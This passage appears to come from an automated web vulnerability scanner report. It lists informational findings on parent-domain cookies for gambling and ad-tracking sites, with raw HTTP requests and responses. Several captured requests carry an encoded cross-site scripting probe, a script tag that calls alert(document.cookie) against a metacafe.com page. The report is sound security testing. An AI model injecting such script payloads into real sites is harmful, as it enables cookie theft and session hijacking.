Set-Cookie: CSI_1=EncryptedUniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:39:07 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: UniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45146


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.55. http://it.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukpfhp45vzrewmabzwaz4dvm; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:58:46 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: UniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.56. http://m.xp1.ru4.com/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c3=Y&ssv_b=c3&ssv_1=285952721 HTTP/1.1
Host: m.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/285952721/direct;wi.300;hi.250/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrwXH9h3RTc7hO4b2lAfr4vmUCfjo9tQBiKHvmxzyn-b8AwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0yODY3NzEzMTkzOTYyOTk2sgEQd3d3Lm1ldGFjYWZlLmNvbboBCjMwMHgyNTBfYXPIAQnaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MZgCsgXAAgHIAubpuAvgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2eoAwH1AwAAAITgBAGABpG6trfLsvz3Sw%26num%3D1%26sig%3DAGiWqtx_Iomlu9mCZTvmsPS82Ewo2V9C3Q%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%2526redirectURL%253D
Cookie: X1ID=AA-00000001931708427; M62795-52786=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-length: 0
Pragma: no-cache
Set-cookie: 17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; domain=.ru4.com; path=/
Set-cookie: O1807966=256; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT
Set-cookie: C17210403=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT
Location: http://http.content.ru4.com/images/pixel.gif
Connection: close


11.57. http://nl.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rdea0n55hhroqxblgqaveqye; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: UniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.58. http://nl.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q2caq0iw5kh0ygn1y3sdtjya; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:19 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: UniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.59. http://nl.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=of4xfwah3rgoyu55lp4wc355; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:09:23 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: UniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.60. http://nl.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c40a2w55f4jphb55iu3y3fjz; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: UniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.61. http://no.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b2f3co55vtup5rji1vapqb55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:58:56 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: UniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.62. http://no.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=m32wka451cran0zbscse5n55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=522E66105AD1EC714AF629DF19E62306&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: UniqueVisitorID=522E66105AD1EC714AF629DF19E62306; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44871


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.63. http://no.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3mvctbasrautiu55bmexne55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=20914B9EC2030E414402DD35EBA7E838&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:39:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: UniqueVisitorID=20914B9EC2030E414402DD35EBA7E838; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.64. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=41&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 12:51:49 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"2\": 1305550329}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Content-Length: 508

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...

11.65. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=572101393;fpan=u;fpa=;ns=0;url=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ebe96a23f3a3%3D1;ref=http%3A%2F%2Fburp%2Fshow%2F22;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=site_name.Metacafe;dst=1;et=1305550311743;tzo=300;a=p-96ifrWFBpTdiA;media=ad;labels=_imp.adserver.doubleclick%2C_imp.publisher.62878001%2C_imp.placement.239990545%2C_imp.creative.41692150 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMIBXQHgBoHyDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 16 May 2011 12:51:52 GMT
Server: QS


11.66. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-96ifrWFBpTdiA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-96ifrWFBpTdiA.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62878001,_imp.placement.239990545,_imp.creative.41692150 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMIBXQHgBoHyDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
